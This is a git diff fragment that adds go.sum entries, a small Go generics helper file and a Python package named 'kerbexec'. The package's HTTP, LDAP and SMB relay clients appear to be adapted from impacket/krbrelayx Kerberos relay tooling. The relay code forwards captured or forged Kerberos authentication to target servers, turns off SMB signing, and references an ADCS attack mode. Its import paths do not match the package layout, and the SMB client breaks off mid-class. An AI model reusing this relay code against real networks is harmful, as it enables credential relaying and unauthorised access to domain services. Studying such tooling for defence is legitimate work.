h1:AxrInvYm1dci+enl5hChSFPOmmUF1+uAa/UsgNRWd7k= +google.golang.org/genproto v0.0.0-20210716133855-ce7ef5c701ea/go.mod h1:AxrInvYm1dci+enl5hChSFPOmmUF1+uAa/UsgNRWd7k= +google.golang.org/genproto v0.0.0-20210728212813-7823e685a01f/go.mod h1:ob2IJxKrgPT52GcgX759i1sleT07tiKowYBGbczaW48= +google.golang.org/genproto v0.0.0-20210805201207-89edb61ffb67/go.mod h1:ob2IJxKrgPT52GcgX759i1sleT07tiKowYBGbczaW48= +google.golang.org/genproto v0.0.0-20210813162853-db860fec028c/go.mod h1:cFeNkxwySK631ADgubI+/XFU/xp8FD5KIVV4rj8UC5w= +google.golang.org/genproto v0.0.0-20210821163610-241b8fcbd6c8/go.mod h1:eFjDcFEctNawg4eG61bRv87N7iHBWyVhJu7u1kqDUXY= +google.golang.org/genproto v0.0.0-20210828152312-66f60bf46e71/go.mod h1:eFjDcFEctNawg4eG61bRv87N7iHBWyVhJu7u1kqDUXY= +google.golang.org/genproto v0.0.0-20210831024726-fe130286e0e2/go.mod h1:eFjDcFEctNawg4eG61bRv87N7iHBWyVhJu7u1kqDUXY= +google.golang.org/genproto v0.0.0-20210903162649-d08c68adba83/go.mod h1:eFjDcFEctNawg4eG61bRv87N7iHBWyVhJu7u1kqDUXY= +google.golang.org/genproto v0.0.0-20210909211513-a8c4777a87af/go.mod h1:eFjDcFEctNawg4eG61bRv87N7iHBWyVhJu7u1kqDUXY= +google.golang.org/genproto v0.0.0-20210924002016-3dee208752a0/go.mod h1:5CzLGKJ67TSI2B9POpiiyGha0AjJvZIUgRMt1dSmuhc= +google.golang.org/genproto v0.0.0-20211008145708-270636b82663/go.mod h1:5CzLGKJ67TSI2B9POpiiyGha0AjJvZIUgRMt1dSmuhc= +google.golang.org/genproto v0.0.0-20211028162531-8db9c33dc351/go.mod h1:5CzLGKJ67TSI2B9POpiiyGha0AjJvZIUgRMt1dSmuhc= +google.golang.org/genproto v0.0.0-20211118181313-81c1377c94b1/go.mod h1:5CzLGKJ67TSI2B9POpiiyGha0AjJvZIUgRMt1dSmuhc= +google.golang.org/genproto v0.0.0-20211129164237-f09f9a12af12/go.mod h1:5CzLGKJ67TSI2B9POpiiyGha0AjJvZIUgRMt1dSmuhc= +google.golang.org/genproto v0.0.0-20211203200212-54befc351ae9/go.mod h1:5CzLGKJ67TSI2B9POpiiyGha0AjJvZIUgRMt1dSmuhc= +google.golang.org/genproto v0.0.0-20211206160659-862468c7d6e0/go.mod h1:5CzLGKJ67TSI2B9POpiiyGha0AjJvZIUgRMt1dSmuhc= +google.golang.org/genproto v0.0.0-20211208223120-3a66f561d7aa/go.mod h1:5CzLGKJ67TSI2B9POpiiyGha0AjJvZIUgRMt1dSmuhc= +google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= +google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38= +google.golang.org/grpc v1.21.1/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM= +google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= +google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= +google.golang.org/grpc v1.26.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.27.1/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.28.0/go.mod h1:rpkK4SK4GF4Ach/+MFLZUBavHOvF2JJB5uozKKal+60= +google.golang.org/grpc v1.29.1/go.mod h1:itym6AZVZYACWQqET3MqgPpjcuV5QH3BxFS3IjizoKk= +google.golang.org/grpc v1.30.0/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak= +google.golang.org/grpc v1.31.0/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak= +google.golang.org/grpc v1.31.1/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak= +google.golang.org/grpc v1.33.1/go.mod h1:fr5YgcSWrqhRRxogOsw7RzIpsmvOZ6IcH4kBYTpR3n0= +google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= +google.golang.org/grpc v1.34.0/go.mod h1:WotjhfgOW/POjDeRt8vscBtXq+2VjORFy659qA51WJ8= +google.golang.org/grpc v1.35.0/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU= +google.golang.org/grpc v1.36.0/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU= +google.golang.org/grpc v1.36.1/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU= +google.golang.org/grpc v1.37.0/go.mod h1:NREThFqKR1f3iQ6oBuvc5LadQuXVGo9rkm5ZGrQdJfM= +google.golang.org/grpc v1.37.1/go.mod h1:NREThFqKR1f3iQ6oBuvc5LadQuXVGo9rkm5ZGrQdJfM= +google.golang.org/grpc v1.38.0/go.mod h1:NREThFqKR1f3iQ6oBuvc5LadQuXVGo9rkm5ZGrQdJfM= +google.golang.org/grpc v1.39.0/go.mod h1:PImNr+rS9TWYb2O4/emRugxiyHZ5JyHW5F+RPnDzfrE= +google.golang.org/grpc v1.39.1/go.mod h1:PImNr+rS9TWYb2O4/emRugxiyHZ5JyHW5F+RPnDzfrE= +google.golang.org/grpc v1.40.0/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= +google.golang.org/grpc v1.40.1/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= +google.golang.org/grpc v1.42.0/go.mod h1:k+4IHHFw41K8+bbowsex27ge2rCb65oeWqe4jJ590SU= +google.golang.org/grpc/cmd/protoc-gen-go-grpc v1.1.0/go.mod h1:6Kw0yEErY5E/yWrBtf03jp27GLLJujG4z/JK95pnjjw= +google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= +google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= +google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= +google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= +google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= +google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4= +google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= +google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= +google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= +google.golang.org/protobuf v1.27.1/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= +gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw= +gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= +gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15 h1:YR8cESwS4TdDjEe65xsg0ogRM/Nc3DYOhEAlW+xobZo= +gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/errgo.v2 v2.1.0/go.mod h1:hNsd1EY+bozCKY1Ytp96fpM3vjJbqLJn88ws8XvfDNI= +gopkg.in/ini.v1 v1.66.2 h1:XfR1dOYubytKy4Shzc2LHrrGhU0lDCfDGG1yLPmpgsI= +gopkg.in/ini.v1 v1.66.2/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k= +gopkg.in/yaml.v2 v2.2.1/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.3/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.4/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.5/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= +gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= +gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +gopkg.in/yaml.v3 v3.0.0 h1:hjy8E9ON/egN1tAYqKb61G10WtihqetD4sz2H+8nIeA= +gopkg.in/yaml.v3 v3.0.0/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= +gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.0-20190106161140-3f1c8253044a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.0-20190418001031-e561f6794a2a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.1-2019.2.3/go.mod h1:a3bituU0lyd329TUQxRnasdCoJDkEUEAqEt0JzvZhAg= +honnef.co/go/tools v0.0.1-2020.1.3/go.mod h1:X/FiERA/W4tHapMX5mGpAtMSVEeEUOyHaw9vFzvIQ3k= +honnef.co/go/tools v0.0.1-2020.1.4/go.mod h1:X/FiERA/W4tHapMX5mGpAtMSVEeEUOyHaw9vFzvIQ3k= +rsc.io/binaryregexp v0.2.0/go.mod h1:qTv7/COck+e2FymRvadv62gMdZztPaShugOCi3I+8D8= +rsc.io/quote/v3 v3.1.0/go.mod h1:yEA65RcK8LyAZtP9Kv3t0HmxON59tX3rD+tICJqUlj0= +rsc.io/sampler v1.3.0/go.mod h1:T1hPZKmBbMNahiBKFy5HrXp6adAjACjK9JXDnKaTXpA= diff --git a/internal/utils.go b/internal/utils.go new file mode 100644 index 0000000..f7ce20e --- /dev/null +++ b/internal/utils.go @@ -0,0 +1,19 @@ +package internal + +func Map[T, U any](collection []T, fn func(T) U) []U { + var out []U + for i := range collection { + out = append(out, fn(collection[i])) + } + return out +} + +func Filter[T any](collection []T, fn func(T) bool) []T { + var out []T + for i := range collection { + if fn(collection[i]) { + out = append(out, collection[i]) + } + } + return out +} diff --git a/kerbexec/__init__.py b/kerbexec/__init__.py new file mode 100644 index 0000000..2ae2839 --- /dev/null +++ b/kerbexec/__init__.py @@ -0,0 +1 @@ +pass diff --git a/kerbexec/clients/__init__.py b/kerbexec/clients/__init__.py new file mode 100644 index 0000000..c80ee73 --- /dev/null +++ b/kerbexec/clients/__init__.py @@ -0,0 +1,101 @@ +# Copyright (c) 2013-2017 CORE Security Technologies +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Protocol Client Base Class definition +# +# Author: +# Alberto Solino (@agsolino) +# +# Description: +# Defines a base class for all clients + loads all available modules +# +# ToDo: +# +import os, sys, pkg_resources +from impacket import LOG + +PROTOCOL_CLIENTS = {} + +# Base class for Protocol Clients for different protocols (SMB, MSSQL, etc) +# Besides using this base class you need to define one global variable when +# writing a plugin for protocol clients: +# PROTOCOL_CLIENT_CLASS = "" +# PLUGIN_NAME must be the protocol name that will be matched later with the relay targets (e.g. SMB, LDAP, etc) +class ProtocolClient: + PLUGIN_NAME = 'PROTOCOL' + def __init__(self, serverConfig, target, targetPort, extendedSecurity=True): + self.serverConfig = serverConfig + self.targetHost = target.hostname + # A default target port is specified by the subclass + if target.port is not None: + # We override it by the one specified in the target + self.targetPort = target.port + else: + self.targetPort = targetPort + self.target = target + self.extendedSecurity = extendedSecurity + self.session = None + self.sessionData = {} + + def initConnection(self): + raise RuntimeError('Virtual Function') + + def killConnection(self): + raise RuntimeError('Virtual Function') + + def sendNegotiate(self, negotiateMessage): + # Charged of sending the type 1 NTLM Message + raise RuntimeError('Virtual Function') + + def sendAuth(self, authenticateMessageBlob, serverChallenge=None): + # Charged of sending the type 3 NTLM Message to the Target + raise RuntimeError('Virtual Function') + + def sendStandardSecurityAuth(self, sessionSetupData): + # Handle the situation When FLAGS2_EXTENDED_SECURITY is not set + raise RuntimeError('Virtual Function') + + def getSession(self): + # Should return the active session for the relayed connection + raise RuntimeError('Virtual Function') + + def getSessionData(self): + # Should return any extra data that could be useful for the SOCKS proxy to work (e.g. some of the + # answers from the original server) + return self.sessionData + + def getStandardSecurityChallenge(self): + # Should return the Challenge returned by the server when Extended Security is not set + # This should only happen with against old Servers. By default we return None + return None + + def keepAlive(self): + # Charged of keeping connection alive + raise RuntimeError('Virtual Function') + +for file in pkg_resources.resource_listdir('lib', 'clients'): + if file.find('__') >=0 or os.path.splitext(file)[1] == '.pyc': + continue + __import__(__package__ + '.' + os.path.splitext(file)[0]) + module = sys.modules[__package__ + '.' + os.path.splitext(file)[0]] + try: + pluginClasses = set() + try: + if hasattr(module,'PROTOCOL_CLIENT_CLASSES'): + for pluginClass in module.PROTOCOL_CLIENT_CLASSES: + pluginClasses.add(getattr(module, pluginClass)) + else: + pluginClasses.add(getattr(module, getattr(module, 'PROTOCOL_CLIENT_CLASS'))) + except Exception as e: + LOG.debug(e) + pass + + for pluginClass in pluginClasses: + LOG.info('Protocol Client %s loaded..' % pluginClass.PLUGIN_NAME) + PROTOCOL_CLIENTS[pluginClass.PLUGIN_NAME] = pluginClass + except Exception as e: + LOG.debug(str(e)) + diff --git a/kerbexec/clients/httprelayclient.py b/kerbexec/clients/httprelayclient.py new file mode 100644 index 0000000..8351ab7 --- /dev/null +++ b/kerbexec/clients/httprelayclient.py @@ -0,0 +1,126 @@ +# Impacket - Collection of Python classes for working with network protocols. +# +# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved. +# +# This software is provided under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Description: +# HTTP Protocol Client +# HTTP(s) client for relaying NTLMSSP authentication to webservers +# +# Author: +# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) +# Alberto Solino (@agsolino) +# +import re +import ssl +try: + from http.client import HTTPConnection, HTTPSConnection, ResponseNotReady +except ImportError: + from httplib import HTTPConnection, HTTPSConnection, ResponseNotReady +import base64 + +from struct import unpack +from impacket import LOG +from lib.clients import ProtocolClient +from lib.utils.kerberos import build_apreq +from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED +from impacket.ntlm import NTLMAuthChallenge +from impacket.spnego import SPNEGO_NegTokenResp + +PROTOCOL_CLIENT_CLASSES = ["HTTPRelayClient","HTTPSRelayClient"] + +class HTTPRelayClient(ProtocolClient): + PLUGIN_NAME = "HTTP" + + def __init__(self, serverConfig, target, targetPort = 80, extendedSecurity=True ): + ProtocolClient.__init__(self, serverConfig, target, targetPort, extendedSecurity) + self.extendedSecurity = extendedSecurity + self.negotiateMessage = None + self.authenticateMessageBlob = None + self.server = None + self.authenticationMethod = None + + def initConnection(self, authdata, kdc=None): + self.session = HTTPConnection(self.targetHost,self.targetPort) + self.lastresult = None + if self.target.path == '': + self.path = '/' + else: + self.path = self.target.path + return self.doInitialActions(authdata, kdc) + + def doInitialActions(self, authdata, kdc=None): + self.session.request('GET', self.path) + res = self.session.getresponse() + res.read() + if res.status != 401: + LOG.info('Status code returned: %d. Authentication does not seem required for URL' % res.status) + try: + if 'Kerberos' not in res.getheader('WWW-Authenticate') and 'Negotiate' not in res.getheader('WWW-Authenticate'): + LOG.error('Kerberos Auth not offered by URL, offered protocols: %s' % res.getheader('WWW-Authenticate')) + return False + if 'Kerberos' in res.getheader('WWW-Authenticate'): + self.authenticationMethod = "Kerberos" + elif 'Negotiate' in res.getheader('WWW-Authenticate'): + self.authenticationMethod = "Negotiate" + except (KeyError, TypeError): + LOG.error('No authentication requested by the server for url %s' % self.targetHost) + if self.serverConfig.isADCSAttack: + LOG.info('IIS cert server may allow anonymous authentication, sending NTLM auth anyways') + else: + return False + + # Negotiate auth + if self.serverConfig.mode == 'RELAY': + # Relay mode is pass-through + negotiate = base64.b64encode(authdata['krbauth']).decode("ascii") + else: + # Unconstrained delegation mode has to build TGT manually + krbauth = build_apreq(authdata['domain'], kdc, authdata['tgt'], authdata['username'], 'http', self.targetHost) + negotiate = base64.b64encode(krbauth).decode("ascii") + + headers = {'Authorization':'%s %s' % (self.authenticationMethod, negotiate)} + self.session.request('GET', self.path ,headers=headers) + res = self.session.getresponse() + res.read() + if res.status == 401: + return None, STATUS_ACCESS_DENIED + else: + LOG.info('HTTP server returned status code %d, treating as a successful login' % res.status) + #Cache this + self.lastresult = res.read() + return None, STATUS_SUCCESS + return True + + def killConnection(self): + if self.session is not None: + self.session.close() + self.session = None + + def keepAlive(self): + # Do a HEAD for favicon.ico + self.session.request('HEAD','/favicon.ico') + self.session.getresponse() + +class HTTPSRelayClient(HTTPRelayClient): + PLUGIN_NAME = "HTTPS" + + def __init__(self, serverConfig, target, targetPort = 443, extendedSecurity=True ): + HTTPRelayClient.__init__(self, serverConfig, target, targetPort, extendedSecurity) + + def initConnection(self, authdata, kdc=None): + self.lastresult = None + if self.target.path == '': + self.path = '/' + else: + self.path = self.target.path + try: + uv_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) + self.session = HTTPSConnection(self.targetHost,self.targetPort, context=uv_context) + except AttributeError: + self.session = HTTPSConnection(self.targetHost,self.targetPort) + return self.doInitialActions(authdata, kdc) + diff --git a/kerbexec/clients/ldaprelayclient.py b/kerbexec/clients/ldaprelayclient.py new file mode 100644 index 0000000..2f1e6a0 --- /dev/null +++ b/kerbexec/clients/ldaprelayclient.py @@ -0,0 +1,61 @@ +import sys +from struct import unpack +from impacket import LOG +from ldap3 import Server, Connection, ALL, NTLM, MODIFY_ADD, SASL, KERBEROS +from ldap3.operation import bind +try: + from ldap3.core.results import RESULT_SUCCESS, RESULT_STRONGER_AUTH_REQUIRED +except ImportError: + LOG.fatal("krbrelayx requires ldap3 > 2.0. To update, use: pip install ldap3 --upgrade") + sys.exit(1) + +from lib.clients import ProtocolClient +from lib.utils.kerberos import ldap_kerberos, ldap_kerberos_auth +from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED +from impacket.ntlm import NTLMAuthChallenge, NTLMAuthNegotiate, NTLMSSP_NEGOTIATE_SIGN +from impacket.spnego import SPNEGO_NegTokenResp + +PROTOCOL_CLIENT_CLASSES = ["LDAPRelayClient", "LDAPSRelayClient"] + +class LDAPRelayClientException(Exception): + pass + +class LDAPRelayClient(ProtocolClient): + PLUGIN_NAME = "LDAP" + MODIFY_ADD = MODIFY_ADD + + def __init__(self, serverConfig, target, targetPort = 389, extendedSecurity=True ): + ProtocolClient.__init__(self, serverConfig, target, targetPort, extendedSecurity) + self.extendedSecurity = extendedSecurity + self.server = None + + def killConnection(self): + if self.session is not None: + self.session.socket.close() + self.session = None + + def initConnection(self, authdata, kdc=None): + if not kdc: + kdc = authdata['domain'] + self.server = Server("ldap://%s:%s" % (self.targetHost, self.targetPort), get_info=ALL) + self.session = Connection(self.server, user="a", password="b", authentication=SASL, sasl_mechanism=KERBEROS) + if self.serverConfig.mode == 'RELAY': + # Pass-thought auth + ldap_kerberos_auth(self.session, authdata['krbauth']) + else: + # Unconstrained delegation mode + ldap_kerberos(authdata['domain'], kdc, authdata['tgt'], authdata['username'], self.session, self.targetHost) + +class LDAPSRelayClient(LDAPRelayClient): + PLUGIN_NAME = "LDAPS" + MODIFY_ADD = MODIFY_ADD + + def __init__(self, serverConfig, target, targetPort = 636, extendedSecurity=True ): + LDAPRelayClient.__init__(self, serverConfig, target, targetPort, extendedSecurity) + + def initConnection(self, authdata, kdc=None): + if not kdc: + kdc = authdata['domain'] + self.server = Server("ldaps://%s:%s" % (self.targetHost, self.targetPort), get_info=ALL) + self.session = Connection(self.server, user="a", password="b", authentication=SASL, sasl_mechanism=KERBEROS) + ldap_kerberos(authdata['domain'], kdc, authdata['tgt'], authdata['username'], self.session, self.targetHost) diff --git a/kerbexec/clients/smbrelayclient.py b/kerbexec/clients/smbrelayclient.py new file mode 100644 index 0000000..e591754 --- /dev/null +++ b/kerbexec/clients/smbrelayclient.py @@ -0,0 +1,415 @@ +# Copyright (c) 2013-2016 CORE Security Technologies +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# SMB Relay Protocol Client +# +# Author: +# Alberto Solino (@agsolino) +# +# Description: +# This is the SMB client which initiates the connection to an +# SMB server and relays the credentials to this server. + +import os + +from struct import unpack +from socket import error as socketerror +from impacket import LOG +from lib.clients import ProtocolClient +from impacket.examples.ntlmrelayx.servers.socksserver import KEEP_ALIVE_TIMER +from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_LOGON_FAILURE +from impacket.ntlm import NTLMAuthNegotiate, NTLMSSP_NEGOTIATE_ALWAYS_SIGN, NTLMAuthChallenge +from impacket.smb import SMB, NewSMBPacket, SMBCommand, SMBSessionSetupAndX_Extended_Parameters, \ + SMBSessionSetupAndX_Extended_Data, SMBSessionSetupAndX_Extended_Response_Data, \ + SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Parameters +from impacket.smb3 import SMB3, SMB2_GLOBAL_CAP_ENCRYPTION, SMB2_DIALECT_WILDCARD, SMB2Negotiate_Response, \ + SMB2_NEGOTIATE, SMB2Negotiate, SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30, SMB2_GLOBAL_CAP_LEASING, \ + SMB3Packet, SMB2_GLOBAL_CAP_LARGE_MTU, SMB2_GLOBAL_CAP_DIRECTORY_LEASING, SMB2_GLOBAL_CAP_MULTI_CHANNEL, \ + SMB2_GLOBAL_CAP_PERSISTENT_HANDLES, SMB2_NEGOTIATE_SIGNING_REQUIRED, SMB2Packet,SMB2SessionSetup, SMB2_SESSION_SETUP, STATUS_MORE_PROCESSING_REQUIRED, SMB2SessionSetup_Response +from impacket.smbconnection import SMBConnection, SMB_DIALECT, SessionError +from impacket.spnego import SPNEGO_NegTokenInit, SPNEGO_NegTokenResp, TypesMech + +PROTOCOL_CLIENT_CLASS = "SMBRelayClient" + +class MYSMB(SMB): + def __init__(self, remoteName, sessPort = 445, extendedSecurity = True, nmbSession = None, negPacket=None): + self.extendedSecurity = extendedSecurity + SMB.__init__(self,remoteName, remoteName, sess_port = sessPort, session=nmbSession, negPacket=negPacket) + + def neg_session(self, negPacket=None): + return SMB.neg_session(self, extended_security=self.extendedSecurity, negPacket=negPacket) + +class MYSMB3(SMB3): + def __init__(self, remoteName, sessPort = 445, extendedSecurity = True, nmbSession = None, negPacket=None): + self.extendedSecurity = extendedSecurity + SMB3.__init__(self,remoteName, remoteName, sess_port = sessPort, session=nmbSession, negSessionResponse=SMB2Packet(negPacket)) + + def negotiateSession(self, preferredDialect = None, negSessionResponse = None): + # We DON'T want to sign + self._Connection['ClientSecurityMode'] = 0 + + if self.RequireMessageSigning is True: + LOG.error('Signing is required, attack won\'t work!') + return + + self._Connection['Capabilities'] = SMB2_GLOBAL_CAP_ENCRYPTION + currentDialect = SMB2_DIALECT_WILDCARD + + # Do we have a negSessionPacket already? + if negSessionResponse is not None: + # Yes, let's store the dialect answered back + negResp = SMB2Negotiate_Response(negSessionResponse['Data']) + currentDialect = negResp['DialectRevision'] + + if currentDialect == SMB2_DIALECT_WILDCARD: + # Still don't know the chosen dialect, let's send our options + + packet = self.SMB_PACKET() + packet['Command'] = SMB2_NEGOTIATE + negSession = SMB2Negotiate() + + negSession['SecurityMode'] = self._Connection['ClientSecurityMode'] + negSession['Capabilities'] = self._Connection['Capabilities'] + negSession['ClientGuid'] = self.ClientGuid + if preferredDialect is not None: + negSession['Dialects'] = [preferredDialect] + else: + negSession['Dialects'] = [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30] + negSession['DialectCount'] = len(negSession['Dialects']) + packet['Data'] = negSession + + packetID = self.sendSMB(packet) + ans = self.recvSMB(packetID) + if ans.isValidAnswer(STATUS_SUCCESS): + negResp = SMB2Negotiate_Response(ans['Data']) + + self._Connection['MaxTransactSize'] = min(0x100000,negResp['MaxTransactSize']) + self._Connection['MaxReadSize'] = min(0x100000,negResp['MaxReadSize']) + self._Connection['MaxWriteSize'] = min(0x100000,negResp['MaxWriteSize']) + self._Connection['ServerGuid'] = negResp['ServerGuid'] + self._Connection['GSSNegotiateToken'] = negResp['Buffer'] + self._Connection['Dialect'] = negResp['DialectRevision'] + if (negResp['SecurityMode'] & SMB2_NEGOTIATE_SIGNING_REQUIRED) == SMB2_NEGOTIATE_SIGNING_REQUIRED: + LOG.error('Signing is required, attack won\'t work!') + return + if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LEASING) == SMB2_GLOBAL_CAP_LEASING: + self._Connection['SupportsFileLeasing'] = True + if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LARGE_MTU) == SMB2_GLOBAL_CAP_LARGE_MTU: + self._Connection['SupportsMultiCredit'] = True + + if self._Connection['Dialect'] == SMB2_DIALECT_30: + # Switching to the right packet format + self.SMB_PACKET = SMB3Packet + if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_DIRECTORY_LEASING) == SMB2_GLOBAL_CAP_DIRECTORY_LEASING: + self._Connection['SupportsDirectoryLeasing'] = True + if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_MULTI_CHANNEL) == SMB2_GLOBAL_CAP_MULTI_CHANNEL: + self._Connection['SupportsMultiChannel'] = True + if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_PERSISTENT_HANDLES) == SMB2_GLOBAL_CAP_PERSISTENT_HANDLES: + self._Connection['SupportsPersistentHandles'] = True + if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_ENCRYPTION) == SMB2_GLOBAL_CAP_ENCRYPTION: + self._Connection['SupportsEncryption'] = True + + self._Connection['ServerCapabilities'] = negResp['Capabilities'] + self._Connection['ServerSecurityMode'] = negResp['SecurityMode'] + +class SMBRelayClient(ProtocolClient): + PLUGIN_NAME = "SMB" + def __init__(self, serverConfig, target, targetPort = 445, extendedSecurity=True ): + ProtocolClient.__init__(self, serverConfig, target, targetPort, extendedSecurity) + self.extendedSecurity = extendedSecurity + + self.domainIp = None + self.machineAccount = None + self.machineHashes = None + 